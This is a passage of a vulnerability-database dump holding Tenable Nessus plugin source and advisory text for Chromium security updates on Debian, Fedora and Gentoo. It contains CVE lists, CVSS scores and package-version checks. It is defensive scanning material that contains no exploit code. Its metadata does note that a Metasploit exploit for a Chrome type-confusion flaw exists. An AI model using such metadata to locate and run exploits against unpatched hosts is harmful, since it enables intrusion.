CVE-2020-6414\n Lijo A.T discovered a policy safe browsing policy\n enforcement error.\n\n - CVE-2020-6415\n Avihay Cohen discovered an implementation error in the\n v8 JavaScript library.\n\n - CVE-2020-6416\n Woojin Oh discovered that untrusted input was\n insufficiently validated.\n\n - CVE-2020-6418\n Clement Lecigne discovered a type error in the v8\n JavaScript library.\n\n - CVE-2020-6420\n Taras Uzdenov discovered a policy enforcement error.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-19926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6387\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6414\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-6420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2020/dsa-4638\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), security support for\nchromium has been discontinued.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 80.0.3987.132-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:07:53", "description": "Update to 80.0.3987.149. Upstream says it fixes '13' security issues, but only lists these CVEs :\n\n - CVE-2020-6422: Use after free in WebGL\n\n - CVE-2020-6424: Use after free in media\n\n - CVE-2020-6425: Insufficient policy enforcement in extensions. \n\n - CVE-2020-6426: Inappropriate implementation in V8\n\n - CVE-2020-6427: Use after free in audio\n\n - CVE-2020-6428: Use after free in audio\n\n - CVE-2020-6429: Use after free in audio.\n\n - CVE-2019-20503: Out of bounds read in usersctplib.\n\n - CVE-2020-6449: Use after free in audio\n\n----\n\nUpdate to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled by default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420 \n\n----\n\nUpdate to 79.0.3945.130. Fixes the following security issues :\n\n - CVE-2020-6378\n\n - CVE-2020-6379\n\n - CVE-2020-6380\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-30T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2020-39e0b8bd14)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20446", "CVE-2019-20503", "CVE-2020-10531", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420", "CVE-2020-6422", "CVE-2020-6424", "CVE-2020-6425", "CVE-2020-6426", "CVE-2020-6427", "CVE-2020-6428", "CVE-2020-6429", "CVE-2020-6449"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2020-39E0B8BD14.NASL", "href": "https://www.tenable.com/plugins/nessus/134990", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-39e0b8bd14.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134990);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-20446\", \"CVE-2019-20503\", \"CVE-2020-10531\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6417\", \"CVE-2020-6418\", \"CVE-2020-6420\", \"CVE-2020-6422\", \"CVE-2020-6424\", \"CVE-2020-6425\", \"CVE-2020-6426\", \"CVE-2020-6427\", \"CVE-2020-6428\", \"CVE-2020-6429\", \"CVE-2020-6449\");\n script_xref(name:\"FEDORA\", value:\"2020-39e0b8bd14\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Fedora 30 : chromium (2020-39e0b8bd14)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 80.0.3987.149. Upstream says it fixes '13' security issues,\nbut only lists these CVEs :\n\n - CVE-2020-6422: Use after free in WebGL\n\n - CVE-2020-6424: Use after free in media\n\n - CVE-2020-6425: Insufficient policy enforcement in\n extensions. \n\n - CVE-2020-6426: Inappropriate implementation in V8\n\n - CVE-2020-6427: Use after free in audio\n\n - CVE-2020-6428: Use after free in audio\n\n - CVE-2020-6429: Use after free in audio.\n\n - CVE-2019-20503: Out of bounds read in usersctplib.\n\n - CVE-2020-6449: Use after free in audio\n\n----\n\nUpdate to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled\nby default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420 \n\n----\n\nUpdate to 79.0.3945.130. Fixes the following security issues :\n\n - CVE-2020-6378\n\n - CVE-2020-6379\n\n - CVE-2020-6380\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-39e0b8bd14\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6449\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-80.0.3987.149-1.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:07:54", "description": "The remote host is affected by the vulnerability described in GLSA-202003-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. Please review the referenced CVE identifiers and Google Chrome Releases for details.\n Impact :\n\n A remote attacker could execute arbitrary code, escalate privileges, obtain sensitive information, spoof an URL or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-13T00:00:00", "type": "nessus", "title": "GLSA-202003-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13723", "CVE-2019-13724", "CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764", "CVE-2019-13767", "CVE-2020-6377", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6385", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6418", "CVE-2020-6420"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202003-08.NASL", "href": "https://www.tenable.com/plugins/nessus/134475", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202003-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134475);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2019-13723\", \"CVE-2019-13724\", \"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\", \"CVE-2019-13767\", \"CVE-2020-6377\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6385\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", \"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6418\", \"CVE-2020-6420\");\n script_xref(name:\"GLSA\", value:\"202003-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"GLSA-202003-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202003-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code, escalate privileges,\n obtain sensitive information, spoof an URL or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202003-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-80.0.3987.132'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n 